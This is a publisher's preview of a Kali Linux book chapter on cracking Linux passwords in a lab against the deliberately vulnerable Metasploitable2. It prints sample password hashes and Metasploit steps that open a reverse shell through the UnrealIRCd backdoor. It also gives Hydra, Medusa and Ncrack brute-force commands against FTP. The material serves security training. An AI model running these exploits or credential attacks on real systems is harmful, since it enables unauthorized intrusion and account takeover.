Packt+ | Advance your knowledge in tech

You're reading from Password Cracking with Kali Linux

Product typeBook

Published inFeb 2024

PublisherPackt

ISBN-139781835888544

Edition1st Edition

Tools

Windows Server Kali Linux

Concepts

Cybersecurity

Author (1)

Daniel W. Dieterle

Chapter 8

Cracking Linux Passwords

Just as passwords hashes can be hacked in Windows, the same can be done with Linux machines. All you need is root level access to obtain the hashes and a good password attack tool to crack them. In this chapter we will use John the Ripper to try our hand at cracking Linux passwords. We will then cover several other tools that can be used to crack server application passwords and perform automated attacks.

Before we get into the meat of this chapter let’s take a look at some actual Linux password hashes. Below are two Linux password hashes, the first is from Metasploitable2, the second is a user I made on my Kali Linux box.

msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/
dan:$6$miC/IqYE$eAHWWJ2S61YKukO.Amlriu4JNCru9vkczyzFndynlrJGF6QjfCjV0Sd70CSmX0Sp9xmthpr11yOR4QTSpJCYN/

The big difference between NTLM passwords and Linux passwords, is that Linux passwords are salted. The salt is a unique string that is used to encode each password making the...

Obtaining Linux Passwords

Metasploitable2 is a purposefully vulnerable Linux system. I cover it extensively in my Basic Kali book, so we will just quickly look at the exploit and password hash recovery here. We will use Kali Linux as our attacking system and use the Metasploit Framework to handle the exploit and hash recovery. We will use the UnrealIRCd backdoor exploit, and then pull the passwords from the system.

➢ Start your Metasploitable 2 VM

➢ On your Kali VM, run Metasploit

➢ In Metasploit enter, “use exploit/unix/irc/unreal_ircd_3281_backdoor”

➢ Enter, “set payload cmd/unix/reverse”

➢ set LHOST [Kali_IP]

➢ set RHOST [Metasploitable2_IP]

➢ And then, “exploit”

This will open a remote Linux command shell, so there won’t be a prompt. Just type...

Automating Password Attacks with Hydra

Tool Authors: Van Hauser, Roland Kessler

Tool Website: https://github.com/vanhauser-thc/thc-hydra

Brute force tools automate the task of using cracked accounts against services. Hydra is a brute force attack program that takes a user list & password list and tries different combinations of them to attack server services. If we make a text file with the usernames and another with the passwords that we acquired above, we can feed them to a program like Hydra.

Create the following two text files (Users, Passwords) enter the values we recovered from the password file and save them in the Kali Home directory:

Users:

➢ msfadmin

➢ sys

➢ klog

➢ service

➢ postgres

➢ user

Passwords:

➢ msfadmin

➢ batman

➢ 1234567898...

Automating Password Attacks with Medusa

Tool Authors: JoMo-Kun, Foofus and Development team

Tool website: https://github.com/jmk-foofus/medusa

Medusa is another automated password attack tool. Medusa functions similarly to Hydra. We can also use the same username and password list. Let’s try this tool against the Metasploitable FTP service.

➢ Use, “medusa -d” to list all available modules

➢ medusa -h [Target_IP] -U ~/Users -P ~/Passwords -M ftp

Medusa tries all of the username, passwords combos and in a short time you should see the following:

The output from Hydra is a little nicer, but it is good to try several different tools to see which one you prefer. Let’s look at one more tool, “Ncrack”.

Automating Password Attacks with Ncrack

Tool Authors: Fotis Hantzis, Fyodor

Tool Website: https://nmap.org/ncrack/

Tool Website: https://nmap.org/ncrack/man.html

Last but not least, we could use Ncrack with the recovered credentials against our target system. Ncrack is a high-speed automated authentication cracking tool. Though it is preferred now to use Nmap’s brute force scripts from the Nmap Scripting Engine (https://nmap.org/book/nse.html) , this is still a very useful tool.

➢ Enter, “ncrack -h” to display available options

➢ ncrack -p 21 -U ~/Users -P ~/Passwords [Metasploitable2_IP]

Between the three tools, I really do not have a preference. Also remember that these tools could be used against Windows systems as well. Better yet, they can be used against multiple systems, so once you get a username/password combo, you can try it against all the systems in a network. Depending on how stealthy you want to...

The rest of the chapter is locked

You have been reading a chapter from

Password Cracking with Kali Linux

Published in: Feb 2024Publisher: PacktISBN-13: 9781835888544

A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.

undefined

Unlock this book and the full library FREE for 7 days

Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of

Start free trial

Renews at AU $19.99/month. Cancel anytime

Author (1)

Daniel W. Dieterle

Daniel W. Dieterle, with over 20 years in IT, has evolved from a system and network support role to a dedicated Computer Security Researcher and Author. His expertise, honed in diverse environments like corporate data centers and Ivy League schools, is reflected in his Kali Linux-based books, widely used globally for security training in universities, government, and private sectors. He has contributed to numerous technical books, articles, and security training classes, and is passionate about mentoring newcomers in the field.
Read more about Daniel W. Dieterle

Personalised recommendations for you

Based on your interests and search pattern

Attacking and Exploiting Modern Web Applications

Attacking and Exploiting Modern Web Attacks will help you understand how to identify attack surfaces and detect vulnerabilities. This book takes a hands-on approach to implementation and associated methodologies and equips you with the knowledge and skills needed to effectively combat web attacks.

BookAug 2023338 pages

Automotive Cybersecurity Engineering Handbook

This Automotive Cybersecurity Engineering Handbook untangles the complexities of building secure automotive products and helps you to comply with cybersecurity standards. It provides practical tools, tips, and techniques coupled with real-world examples to enable you to create cyber-resilient automotive products with ease.

BookOct 2023392 pages

Official Google Cloud Certified Professional Cloud Security Engineer Exam Guide

This book will help you to design, develop, and operate security controls on Google Cloud as well as discover best practices for relevant security domains, including identity and access management, network, and data.

BookAug 2023496 pages

Cloud Penetration Testing for Red Teamers

The advent of cloud networks and the AWS, Azure, and GCP platforms has revolutionized how companies of all sizes in all industries do business online. This book will help you meet the emerging demand for pentesting as it guides you through the tools, techniques, and security measures used by pentesters and red teamers in the 2020s and beyond.

BookNov 2023298 pages

ISACA Certified in Risk and Information Systems Control (CRISC®) Exam Guide

ISACA Certified in Risk and Information Systems Control (CRISC®) Certification Guide is an enterprise IT risk management professional’s dream. With its in-depth approach and various self-assessment exercises, this book arms you with knowledge of every single aspect of the certification, and is a fantastic career companion after you’re certified.

BookSep 2023316 pages5

Burp Suite Cookbook

Burp Suite is an immensely powerful and popular tool for web application security testing. This book provides a collection of recipes that address vulnerabilities in web applications and APIs. It offers guidance on how to configure Burp Suite, make the most of its tools, and explore into its extensions.

BookOct 2023450 pages

Building and Automating Penetration Testing Labs in the Cloud

This hands-on guide will help you design and build a variety of penetration testing labs that mimic modern cloud environments running on AWS, Azure, and GCP. In addition to these, you will explore a number of practical strategies on how to manage the complexity, cost, and security risks involved when setting up vulnerable cloud lab environments.

BookOct 2023562 pages

Ethical Hacking Workshop

As cyber-attacks grow and APT groups advance their skillset, you need to be able to protect your enterprise against cyber-attacks. In order to limit your attack surface, you need to ensure that you leverage the same skills and tools that an adversary may use to hack your environment and discover the security gaps. This book will teach you how to think like a hacker, use state-of-the-art hacking tools, and protect yourself and your organizaiton.

BookOct 2023220 pages

Windows Forensics Analyst Field Guide

This book contains step-by-step processes to guide you in any investigation related to Windows OS. You’ll find out how to acquire evidence using multiple tools as well as examine and analyze the collected artifacts, while discovering multiple techniques used in real-world forensic incidents.

BookOct 2023318 pages

Implementing DevSecOps Practices

This book is a comprehensive, hands-on guide for individuals new to DevSecOps who want to implement DevSecOps practices successfully and efficiently. With its help, you’ll be able to shift security toward the left, enabling you to merge security into coding in no time.

BookDec 2023258 pages